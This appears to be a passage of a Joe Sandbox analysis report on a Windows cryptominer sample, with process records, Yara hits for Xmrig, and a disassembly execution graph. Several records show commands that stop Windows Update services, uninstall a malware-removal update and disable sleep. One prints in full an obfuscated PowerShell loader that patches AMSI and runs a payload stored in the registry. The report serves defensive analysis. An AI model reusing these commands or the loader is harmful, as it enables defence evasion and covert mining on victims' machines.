                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:42
                                                                Start time:11:23:03
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                Imagebase:0x7ff6d9560000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:43
                                                                Start time:11:23:03
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:44
                                                                Start time:11:23:03
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:45
                                                                Start time:11:23:03
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:46
                                                                Start time:11:23:03
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\wusa.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                Imagebase:0x7ff74dc80000
                                                                File size:345'088 bytes
                                                                MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:47
                                                                Start time:11:23:03
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:48
                                                                Start time:11:23:03
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:49
                                                                Start time:11:23:03
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:50
                                                                Start time:11:23:03
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:51
                                                                Start time:11:23:03
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop bits
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:52
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:53
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:54
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:55
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                Imagebase:0x7ff75d8f0000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:56
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                Imagebase:0x7ff75d8f0000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:57
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:58
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                Imagebase:0x7ff75d8f0000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:59
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:60
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                Imagebase:0x7ff75d8f0000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:61
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:62
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\dialer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\dialer.exe
                                                                Imagebase:0x7ff7c38e0000
                                                                File size:39'936 bytes
                                                                MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:63
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:64
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\dialer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\dialer.exe
                                                                Imagebase:0x7ff7c38e0000
                                                                File size:39'936 bytes
                                                                MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:65
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\dialer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:dialer.exe
                                                                Imagebase:0x7ff7c38e0000
                                                                File size:39'936 bytes
                                                                MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.2939799608.000002F62B721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.2939799608.000002F62B6C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                Has exited:false

                                                                General

                                                                Target ID:66
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DwpcGqRaxEQb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kwrQxTwRDzvgHI,[Parameter(Position=1)][Type]$doUOZqbWki)$ZycFOOCRuuH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+'M'+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+'ga'+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'lass',[MulticastDelegate]);$ZycFOOCRuuH.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+'e'+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'d'+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+'nt'+'i'+'m'+[Char](101)+','+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$ZycFOOCRuuH.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'Sig'+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$doUOZqbWki,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $ZycFOOCRuuH.CreateType();}$PIBnzpATGOiSb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+[Char](46)+'d'+'l'+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+'s'+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+'.'+'Uns'+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+'s');$BXLsZikXLBwiCU=$PIBnzpATGOiSb.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+'Ad'+[Char](100)+'res'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,St'+[Char](97)+'ti'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PODdpwJbLVAeqmqHxFL=DwpcGqRaxEQb @([String])([IntPtr]);$yBpeaDKUEGooqcDLMYJxLn=DwpcGqRaxEQb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ckLkUNcHalt=$PIBnzpATGOiSb.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+''+[Char](46)+'dll')));$gtTuUeciWixJxL=$BXLsZikXLBwiCU.Invoke($Null,@([Object]$ckLkUNcHalt,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+'Li'+[Char](98)+'r'+[Char](97)+'ryA')));$XRPINnzEnujTAspan=$BXLsZikXLBwiCU.Invoke($Null,@([Object]$ckLkUNcHalt,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+'e'+''+'c'+''+'t'+'')));$DBzwtCM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gtTuUeciWixJxL,$PODdpwJbLVAeqmqHxFL).Invoke(''+[Char](97)+''+[Char](109)+'si'+'.'+''+[Char](100)+'ll');$DyCMYouZARyvvTbwm=$BXLsZikXLBwiCU.Invoke($Null,@([Object]$DBzwtCM,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+[Char](99)+'a'+'n'+'B'+'u'+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$GgVQgYCQUN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XRPINnzEnujTAspan,$yBpeaDKUEGooqcDLMYJxLn).Invoke($DyCMYouZARyvvTbwm,[uint32]8,4,[ref]$GgVQgYCQUN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DyCMYouZARyvvTbwm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XRPINnzEnujTAspan,$yBpeaDKUEGooqcDLMYJxLn).Invoke($DyCMYouZARyvvTbwm,[uint32]8,0x20,[ref]$GgVQgYCQUN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+''+'a'+''+'l'+''+'e'+''+'r'+''+[Char](115)+''+'t'+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:67
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:68
                                                                Start time:11:23:05
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\dllhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{cf3d95db-0758-4a82-bfdc-72f769e75e83}
                                                                Imagebase:0x7ff70f330000
                                                                File size:21'312 bytes
                                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:69
                                                                Start time:11:23:05
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\winlogon.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:winlogon.exe
                                                                Imagebase:0x7ff7cd660000
                                                                File size:906'240 bytes
                                                                MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:70
                                                                Start time:11:23:05
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\lsass.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\lsass.exe
                                                                Imagebase:0x7ff7a2ae0000
                                                                File size:59'456 bytes
                                                                MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:71
                                                                Start time:11:23:06
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\svchost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                Imagebase:0x7ff6eef20000
                                                                File size:55'320 bytes
                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:72
                                                                Start time:11:23:06
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\dwm.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"dwm.exe"
                                                                Imagebase:0x7ff74e710000
                                                                File size:94'720 bytes
                                                                MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:73
                                                                Start time:11:23:06
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\dllhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{0efb55d5-e8e1-4bc9-b3c4-28c83a2f4e5a}
                                                                Imagebase:0x7ff70f330000
                                                                File size:21'312 bytes
                                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:74
                                                                Start time:11:23:07
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\svchost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                Imagebase:0x7ff6eef20000
                                                                File size:55'320 bytes
                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:75
                                                                Start time:11:23:07
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\svchost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                Imagebase:0x7ff6eef20000
                                                                File size:55'320 bytes
                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Executed Functions

                                                                  Function 00007FF712421140 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727657135.00007FF712421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712420000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727623183.00007FF712420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727699824.00007FF71242C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727738634.00007FF71242F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727772505.00007FF712430000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728525064.00007FF71291F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728573416.00007FF712958000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff712420000_0Ty.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                                  • Instruction ID: f38de9a0cc0fc67c9b85663b298365090772ce3e75d74cb40ddf3daf2572c0f6
                                                                  • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                                  • Instruction Fuzzy Hash: 30B09234904A4984E2013B82E84126862606B08750F810020C80C02352CEBD58648B61

                                                                  Execution Graph

                                                                  Execution Coverage:75.2%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:38.5%
                                                                  Total number of Nodes:96
                                                                  Total number of Limit Nodes:1
                                                                  execution_graph 190 140001970 193 140001984 FindResourceExA 190->193 194 140001979 ExitProcess 193->194 195 1400019ae SizeofResource 193->195 195->194 196 1400019c3 LoadResource 195->196 196->194 197 1400019d7 LockResource RegOpenKeyExW 196->197 197->194 198 140001a0e RegSetValueExW 197->198 198->194 199 140001a34 198->199 209 140001a7c GetProcessHeap HeapAlloc StrCpyW 199->209 203 140001a48 204 1400017ec 9 API calls 203->204 205 140001a57 204->205 252 14000117c 7 API calls 205->252 207 140001a62 207->194 262 140001614 SysAllocString SysAllocString CoInitializeEx 207->262 272 14000114c GetModuleHandleA 209->272 212 140001b05 StrCatW StrCatW 275 140001c9c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 212->275 213 140001ad5 StrCatW StrCatW StrCatW 213->212 218 140001c0c 6 API calls 219 140001b4b 218->219 220 140001c0c 6 API calls 219->220 221 140001b5a 220->221 222 140001c0c 6 API calls 221->222 223 140001b69 222->223 224 140001c0c 6 API calls 223->224 225 140001b78 224->225 226 140001c0c 6 API calls 225->226 227 140001b87 226->227 228 140001c0c 6 API calls 227->228 229 140001b96 228->229 230 140001c0c 6 API calls 229->230 231 140001ba5 230->231 232 140001c0c 6 API calls 231->232 233 140001bb4 232->233 234 140001c0c 6 API calls 233->234 235 140001bc3 234->235 236 140001c0c 6 API calls 235->236 237 140001bd2 236->237 238 140001c0c 6 API calls 237->238 239 140001be1 238->239 240 140001c0c 6 API calls 239->240 241 140001bf0 240->241 242 140001c0c 6 API calls 241->242 243 140001a39 242->243 244 1400017ec SysAllocString SysAllocString CoInitializeEx 243->244 245 140001948 SysFreeString SysFreeString 244->245 246 14000182d CoInitializeSecurity 244->246 245->203 247 140001875 CoCreateInstance 246->247 248 140001869 246->248 249 140001942 CoUninitialize 247->249 250 1400018a4 VariantInit 247->250 248->247 248->249 249->245 251 1400018fa 250->251 251->249 253 14000120e CoInitializeSecurity 252->253 254 1400015c0 6 API calls 252->254 255 140001256 CoCreateInstance 253->255 256 14000124a 253->256 254->207 257 1400015ba CoUninitialize 255->257 258 140001287 VariantInit 255->258 256->255 256->257 257->254 260 1400012de 258->260 259 140001537 259->257 260->259 261 140001489 VariantInit VariantInit VariantInit 260->261 261->259 263 1400017c5 SysFreeString SysFreeString 262->263 264 140001655 CoInitializeSecurity 262->264 263->194 265 140001691 264->265 266 14000169d CoCreateInstance 264->266 265->266 267 1400017bf CoUninitialize 265->267 266->267 268 1400016cc VariantInit 266->268 267->263 269 140001722 268->269 270 14000175c 